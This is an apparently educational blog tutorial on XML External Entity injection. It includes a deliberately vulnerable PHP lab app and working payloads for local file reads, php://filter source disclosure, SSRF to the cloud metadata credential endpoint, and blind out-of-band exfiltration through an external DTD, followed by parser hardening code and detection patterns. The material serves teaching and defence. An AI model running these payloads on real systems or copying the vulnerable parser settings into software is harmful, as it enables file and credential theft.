Disclaimer: This article is for education and authorized testing only. Run these techniques exclusively against systems you own or have explicit written permission to test. Unauthorized testing is illegal in most jurisdictions.
Introduction
XML External Entity (XXE) injection remains one of the most impactful server-side flaws in the OWASP catalogue. When an application parses attacker-controlled XML with a misconfigured parser, an attacker can read local files, perform server-side request forgery (SSRF) against internal services, and, even when the application reflects nothing back, exfiltrate data through out-of-band (OOB) channels.
In this post you'll learn how XXE actually works at the parser level, how to confirm and exploit a classic file-disclosure XXE, and how to escalate to blind XXE with an external DTD and OOB exfiltration. We'll close with a Blue Team section that carries equal weight: how to detect and shut these attacks down.
How It Works
XML supports a feature called entities — placeholders that the parser expands at parse time. They are declared in a Document Type Definition (DTD), introduced with the <!DOCTYPE ...> declaration.
A normal internal entity simply substitutes a string:
<!DOCTYPE foo [ <!ENTITY name "yunolay"> ]>
<data>&name;</data>
An external entity tells the parser to fetch content from a URI, and this is where the danger lies. The SYSTEM keyword accepts file://, http://, ftp://, and (depending on the parser/PHP wrappers) other schemes:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<data>&xxe;</data>
If the application reflects the parsed value back to the user, the contents of /etc/passwd appear in the response. The root cause is parsers that resolve external entities by default: historically Java's DocumentBuilderFactory, PHP's libxml (pre-2.9.0 default), .NET's XmlDocument, and many others.
When the response does not echo the entity, the attack becomes blind. We then chain a parameter entity with an external DTD to force the parser to make an outbound request carrying the stolen data — the OOB technique.
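To see the internal/external distinction at the parser level, here is a minimal sketch that uses Python's standard-library xml.etree.ElementTree as a stand-in parser. That choice is an assumption for illustration only; the lab target in this post is PHP. In current CPython this parser expands internal entities but declines to resolve external ones and raises ParseError instead, which is roughly the behaviour a hardened parser should show.

```python
import xml.etree.ElementTree as ET

# Same two documents as above, written on one line each.
INTERNAL = '<!DOCTYPE foo [ <!ENTITY name "yunolay"> ]><data>&name;</data>'
EXTERNAL = '<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><data>&xxe;</data>'


def parse_text(doc: str) -> str:
    """Return the root element's text, or a marker if the parser refuses the document."""
    try:
        return ET.fromstring(doc).text or ""
    except ET.ParseError as exc:
        return f"refused: {exc}"


print(parse_text(INTERNAL))  # internal entity is substituted
print(parse_text(EXTERNAL))  # external entity is not fetched; parsing is refused
```

A vulnerable parser would return the file contents for the second document instead of refusing it.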
Prerequisites / Lab Setup
You need a vulnerable endpoint that accepts XML. The simplest local target is a small PHP service with the legacy resolver enabled:
<?php
// index.php — DELIBERATELY VULNERABLE, lab only
libxml_disable_entity_loader(false); // re-enables external entities
$xml = file_get_contents('php://input');
$doc = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NOENT | LIBXML_DTDLOAD);
echo "Hello, " . $doc->name;
Run it alongside an attacker-controlled "collaborator" listener:
# Terminal 1 — vulnerable app
php -S 127.0.0.1:8080
# Terminal 2 — OOB / exfil listener (also serves the malicious DTD)
python3 -m http.server 8000
For real engagements, Burp Suite Collaborator provides a unique DNS/HTTP catcher; the local http.server above is a stand-in.
Attack Walkthrough
1. Confirm XML parsing
Send a benign internal entity and check it expands:
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY t "PROOF"> ]>
<root><name>&t;</name></root>'
# Response: "Hello, PROOF" -> entities are processed
2. Classic file disclosure (in-band)
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root><name>&xxe;</name></root>'
The response now contains /etc/passwd. On PHP targets, the php://filter wrapper base64-encodes files that would otherwise break the XML parser (e.g. source code containing <):
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [ <!ENTITY xxe SYSTEM
"php://filter/convert.base64-encode/resource=/var/www/html/index.php"> ]>
<root><name>&xxe;</name></root>'
Strip the leading "Hello, " from the response, then pipe the remainder to base64 -d to recover the source.
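The decoding step can also be sketched in Python. This assumes the response looks like the lab app's output, a "Hello, " greeting followed by the base64 text; the function name recover_source and the prefix default are hypothetical, and str.removeprefix needs Python 3.9 or later.

```python
import base64


def recover_source(response_body: str, prefix: str = "Hello, ") -> bytes:
    """Drop the lab app's greeting and base64-decode whatever follows it."""
    payload = response_body.strip().removeprefix(prefix.strip()).strip()
    # validate=True raises on stray characters instead of silently skipping them.
    return base64.b64decode(payload, validate=True)


# Self-contained demo: build a response the way the lab app would for a tiny file.
demo = "Hello, " + base64.b64encode(b"<?php echo 1; ?>").decode()
print(recover_source(demo))
```

Decoding with validation turned on makes it obvious when extra markup has leaked into the response, rather than producing corrupted output.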
3. XXE to SSRF
Swap the file:// URI for an internal HTTP target to reach metadata services or internal apps:
<!DOCTYPE r [ <!ENTITY xxe SYSTEM
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>
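<root><name>&xxe;</name></root>
This is a common pivot into cloud credential theft; see also SSRF to cloud metadata. On AWS, this path answers unauthenticated requests only under IMDSv1; IMDSv2 requires a session-token header that an entity fetch cannot set.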
4. Blind XXE with OOB exfiltration
When nothing is reflected, host an external DTD on your listener. Save this as evil.dtd served by the http.server:
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
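<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://127.0.0.1:8000/?d=%file;'>">
%eval;
%exfil;
The inner percent sign is written as the character reference &#x25; because a bare % inside an entity value would be read as the start of a parameter-entity reference and the DTD would fail to parse. Then submit a payload that pulls and triggers the external DTD via parameter entities (%):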
curl -s http://127.0.0.1:8080/ \
--data-binary '<?xml version="1.0"?>
<!DOCTYPE r [
<!ENTITY % remote SYSTEM "http://127.0.0.1:8000/evil.dtd">
%remote;
]>
<root><name>test</name></root>'
The parser fetches evil.dtd, reads the target file into %file, builds an entity whose URI embeds that data, and resolves it, sending a request to your listener:
127.0.0.1 - - "GET /?d=cm9vdDp4OjA6MDpyb290Oi9yb290... HTTP/1.0" 200
Base64-decode the d parameter to recover the file. This works even when the parser blocks general external entities inside the internal subset, because parameter entities in an external DTD are processed separately. For files containing newlines, an FTP-based exfil DTD (using a tool like xxeftp / XXEinjector) avoids HTTP query-string truncation.
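Recovering the file from a captured request can be sketched as below. The helper name decode_exfil is hypothetical, and the sketch assumes you pass it the quoted request line from the listener log (method, target, protocol) with the full, untruncated d value.

```python
import base64
from urllib.parse import parse_qs, urlsplit


def decode_exfil(request_line: str, param: str = "d") -> bytes:
    """Extract a base64 query parameter from an HTTP request line and decode it."""
    parts = request_line.split()
    if len(parts) < 2:
        raise ValueError("expected 'METHOD target PROTOCOL'")
    values = parse_qs(urlsplit(parts[1]).query).get(param)
    if not values:
        raise ValueError(f"no {param!r} parameter in request")
    # parse_qs turns '+' into a space; undo that, then restore stripped padding.
    blob = values[0].replace(" ", "+")
    blob += "=" * (-len(blob) % 4)
    return base64.b64decode(blob)


print(decode_exfil("GET /?d=cm9vdDp4OjA6MDpyb290Oi9yb290 HTTP/1.0"))
```

The sample value is the visible part of the log line above, so the output is only the first fields of the first /etc/passwd entry.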
Attack Flow Diagram

The diagram shows the blind OOB chain: the app fetches the attacker's DTD, reads a local file, then leaks it back over an outbound request the attacker captures.
Detection & Defense (Blue Team)
XXE is fully preventable at the parser layer. Defense should be applied with the same rigor as any offensive testing.
1. Disable DTDs and external entities (primary control). This is the definitive fix.
// Java — DocumentBuilderFactory hardening
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);
// .NET: safe XmlReader settings
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null
};
// PHP >= 8.0: external entities are off by default.
// libxml_disable_entity_loader() is deprecated since PHP 8.0; never call it to re-enable loading.
// Avoid LIBXML_NOENT and LIBXML_DTDLOAD on untrusted input.
$doc = simplexml_load_string($xml); // no dangerous flags
2. Egress filtering. Block the application's outbound DNS/HTTP to arbitrary destinations. OOB and SSRF-based XXE both depend on the server making requests it never normally should. Deny-by-default egress neutralizes blind exfiltration.
3. WAF and input validation. Reject requests whose body contains <!DOCTYPE or <!ENTITY when your API does not legitimately need a DTD. This is a defense-in-depth signal, not a primary control.
4. Detection rules. Hunt for these in WAF/proxy logs:
# Surface likely XXE attempts in access/body logs
grep -aiE '<!DOCTYPE|<!ENTITY|SYSTEM "file:|php://filter|169\.254\.169\.254' access.log
Alert on application servers initiating outbound connections to unexpected hosts, requests to 169.254.169.254, and file:// access patterns in parser error logs. Map this to MITRE ATT&CK T1190 (Exploit Public-Facing Application) and the SSRF pivot to T1552.005 (Cloud Instance Metadata API).
5. Keep libraries patched. Track CVEs in your XML stack, e.g. CVE-2018-1000840 (an XXE in the loadXML() function of Processing 3.4 and earlier) and the recurring XXE issues in office-document and SOAP parsers. Many frameworks now ship secure-by-default, but legacy services lag.
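The input check from item 3 and the log hunt from item 4 can share one pattern. The sketch below mirrors the grep expression in Python; the names XXE_INDICATORS, has_xxe_indicator, and suspicious_lines are hypothetical. It matches raw text only, so URL-encoded or UTF-16 payloads would slip past it, which is one reason this stays a defense-in-depth signal rather than a primary control.

```python
import re
from typing import Iterable, Iterator, Tuple

# Same alternatives as the grep expression above, matched case-insensitively.
XXE_INDICATORS = re.compile(
    r'<!DOCTYPE|<!ENTITY|SYSTEM "file:|php://filter|169\.254\.169\.254',
    re.IGNORECASE,
)


def has_xxe_indicator(text: str) -> bool:
    """True if a request body or log line contains a known XXE marker."""
    return XXE_INDICATORS.search(text) is not None


def suspicious_lines(lines: Iterable[str]) -> Iterator[Tuple[int, str]]:
    """Yield (line_number, line) for every log line that matches."""
    for number, line in enumerate(lines, start=1):
        if has_xxe_indicator(line):
            yield number, line.rstrip("\n")


sample_log = [
    "GET /health HTTP/1.1\n",
    "GET /fetch?u=http://169.254.169.254/latest/meta-data/ HTTP/1.1\n",
]
for hit in suspicious_lines(sample_log):
    print(hit)
```

An API that never needs a DTD could call has_xxe_indicator on the request body and reject on a match before the XML ever reaches the parser.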
For broader server-side exploitation context, see Server-Side Template Injection.
Conclusion
XXE turns a routine XML endpoint into a file-read, SSRF, and data-exfiltration primitive. The classic in-band variant is easy to confirm and exploit; the blind OOB variant — using parameter entities and an external DTD — defeats applications that simply stop reflecting output. The good news for defenders is that a single, well-understood configuration (disable DTDs and external entities) eliminates the entire class. Combine that with strict egress controls and log-based detection, and XXE moves from "critical finding" to "non-issue."
References
- OWASP — XML External Entity (XXE) Prevention Cheat Sheet
- PortSwigger Web Security Academy — XXE injection
- HackTricks — XXE – XEE – XML External Entity
- MITRE ATT&CK — T1190 Exploit Public-Facing Application, T1552.005
- MITRE CVE — CVE-2018-1000840


